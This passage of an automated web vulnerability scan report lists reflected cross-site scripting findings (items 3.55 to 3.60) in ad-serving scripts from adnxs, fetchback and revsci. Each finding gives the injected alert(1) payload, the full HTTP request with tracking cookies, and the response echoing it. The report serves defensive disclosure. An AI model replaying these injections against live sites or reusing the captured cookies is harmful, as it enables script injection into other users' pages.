Set-Cookie: anj=Kfw))BAdco)Wh]f7y?S'<HuAT(p@Qw9/AE-(4U+vPzGLjvFYk+nwysnbZ%yhp+G^!>mHJ/[Qn^SOF-W3Xf4z<*dQUsD:-u*1$#oEh8TFFha?sqBS/]6^U*/DbYg]Mqr2:Vrct.WtC2KToR@.$C)m(E`TsR*PohR2#_*h3662#-/tB6eZAKR#N:HS+e/G^B=:]G41iy*]23/(BwUCth]o51ZN_d27HnxGMo'uGGi(0X6$G(F[[<8?bE841yayI#UtGV.cq'ri('l!6LQJWN9l2cQoV*iH]11`lAb^b)0'xX=oN/+4vHi'1gSOc<9S4EE#@*(d7)k=U8C:JN%F-F4S3G$R:hjq><pByr`w=(:CAj+.g-MCVWn_u4R:k)M3w5#XRmD0G`[FsG_#6$(1LQv'bPN@3tQ##@s758hws:.[A7a/=+]WZ_fuE/MN<Btb/ToI#4D^oB.M7l2j2mjE_@Bzt<s``c/L5dxwk2KDKIFkz]gq-b4i]Sr8x.$v]gGt`l9(lXF6KaOm][.o$F:sQaS<6[()-<5$NWVFtbjNC!m2d_!77Iw`jK:R1Y%$$(MKIm5.<][BBy!>2Q!7Lhus`)aMi%9I7E.:UZOfpwq^nA-UOE0NIUorSW3hNy; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:02 GMT
Content-Length: 1468

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAASS3fXgAAAAA./cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQCaedca'-alert(1)-'239f7d9d658/referrer=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages/clickenc=http%3A%2F%2Fwww.1800flowers.com%2Frefer.do%3Fr%3
...[SNIP]...

3.55. http://ib.adnxs.com/ab [custom_macro parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 676e8'%3balert(1)//ac3354cabe was submitted in the custom_macro parameter. This input was echoed as 676e8';alert(1)//ac3354cabe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8676e8'%3balert(1)//ac3354cabe&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vt>vMr8g<B)#kQD2BQ%KJQUPq'0FP0G>i/e:Qc*>v.pXxAzo0EmQU<wKU!?-n$)FuX+9::dG9$]P=bB9=KQ3VDqSp>]+c$9xZgM0:#`mv`egs9[Zs#Tm8tKRN[(IqkzJsrKg#Il/>mh'Aw`7Y7j?03ZmAl8.J)NHKIE>]===+mPT2IDg(oYoU6mwDQJZ>k/JXf11=8a*m0NKBz>LI_kuKVy<>xeO1cNsy?[h0iVz>1Z!:K2zPM$>)62*@?wi/i1l9)s2T=Z0:MIlHiRYm!jT:CV2hPWmTjX6I]dq<@$i?62FM[?>NEQqOTgzZhjQh7B^M/'0yu[>bUhl/X=[w[*`ootb('G4k=aZ5wnPmF5t7HIvrz7#I3C<^2/j3wcQ5Q[TxNH:3lOzx^F^4X^U(#mPpW[w(HpOWk.Mg87T3<t+<g[>jaB4phea329Q9Q:oIk.ah$W8jmjmq[u[Rq45%Z+Tw-X%07JfHyq[eTsKZC6Zp%L2Mq5VPFc])io#nF$(8yxjqkwSzMH1/Y0=>7(.3eEJP$k64/Cq'*33Bi3ib:R)BiMQhKJQB.VpW`%@X>AZWwAWvE)DqcSYa`.:C_o)CPSUzd3zH72eX(`=wzAW4hEdk*; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:13 GMT
Content-Length: 1518

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=H26G&n_cid=47078&crid=300x250_8F_Interim_finalgif&n_crid=327251&mpm=CPM&n_g=u&n_a=0&aids=H26G-8676e8';alert(1)//ac3354cabe&n_price=1.511628&n_bust=1304949616&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-x-_-x15off-_-postvday%26cm_mmca1%3D30
...[SNIP]...

3.56. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f10ad'%3balert(1)//60a1fb087ec was submitted in the redir parameter. This input was echoed as f10ad';alert(1)//60a1fb087ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3Ff10ad'%3balert(1)//60a1fb087ec HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEw7eaf7gQQ7eaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb133666=5_[r^202nWv$PLv0nf8M[Ys2+?enc=rkfhehSu4z-DwMqhRbbhPwAAAAAAAPA_g8DKoUW24T-uR-F6FK7jPzb1FLF9zeROSsYda6b2ziVt88dNAAAAALY-AwA3AQAAGgEAAAIAAACrJgQAkWAAAAEAAABVU0QAVVNEACwBWAKqAQAA3wsBAgUCAAUAAAAARyUkjgAAAAA.&tt_code=cm.tribune&udj=uf%28%27a%27%2C+2248%2C+1304949613%29%3Buf%28%27c%27%2C+61473%2C+1304949613%29%3Buf%28%27r%27%2C+272043%2C+1304949613%29%3Bppv%287166%2C+%275684894569373955382%27%2C+1304949613%2C+1336485613%2C+61473%2C+24721%29%3B&cnd=!AxYOawih4AMQq80QGAAgkcEBKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[7Pl_F#:3V_M'dWhq<A4H9QLwh!0(2d(:ZyP'RCvb./f.(AQEh7GXym(].`Qj0%7`fZ:(E9V)IjhpWXS^efpCN#M1:-ppF^x.X)sgXP^jl:%[)rcMuH4Nf@kf+1^R-)S>XM5XPrPErAzb4-^a4y@Jx`bv:za2Z1YQHReEE7N'0=1'b#WYayc'16yUR#PmqgRNSeu>Hnq$4n5N(wZhI:G3G^w>>s-.6hU<:[/xh9)p3_0)uj3eO+Cv-/*(0$W`5v[FaE-1r0pCXmB`tyV$2!luhmrx>S#*].(5s.Z!F=sL>?ZMLXXKeCE$`f%U#<.Vr(2YPMbq8r*Oyu2`zKCrSA0w6kFos`u*A@=8(6<k:P1rsXF`Rd0.w(7ba)>_Mpgwbe*2/`rux6!0iVYbij2Z6nZ-c?cOa#n^<Ga:jYoKIKQ0t(nw9!0a(!oOgpu*?'%%gRXF)1hx-CUx5u`W-8Ct+Qm60WPMsHmUS/>#4OdTJx+KCMm*E:=KUCI8M4DN=ZhjFId#K??]aY=yV(aaiJ*!T(Cj/Rd*6LcB16Pp'4k9L2b0d1v*[w(H]u'0ytiMqP2wZM+I$`:y#ChV=lN%9$vaKzY3; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:00:13 GMT
Content-Length: 650

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.40-cm.ent_l-cm.music_h-
...[SNIP]...
;sz=300x600;net=cm;ord1=680525;contx=ent;an=40;dc=w;btg=cm.ent_l;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=5044004?f10ad';alert(1)//60a1fb087ec">
...[SNIP]...

3.57. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c772f"-alert(1)-"078d1e6149 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=c772f"-alert(1)-"078d1e6149 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949708_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:48 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:48 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 325

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=c772f"-alert(1)-"078d1e6149' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.58. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ea5"-alert(1)-"d84ddfca88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=&c0ea5"-alert(1)-"d84ddfca88c=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:25 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949745_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:02:25 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:02:25 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 329

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=&c0ea5"-alert(1)-"d84ddfca88c=1' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.59. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 346f9"-alert(1)-"99b469e8563 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky346f9"-alert(1)-"99b469e8563&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:43 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949703_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky346f9"-alert(1)-"99b469e8563&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.60. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 4fec0<script>alert(1)</script>53371e24c20 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=B087254fec0<script>alert(1)</script>53371e24c20 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2J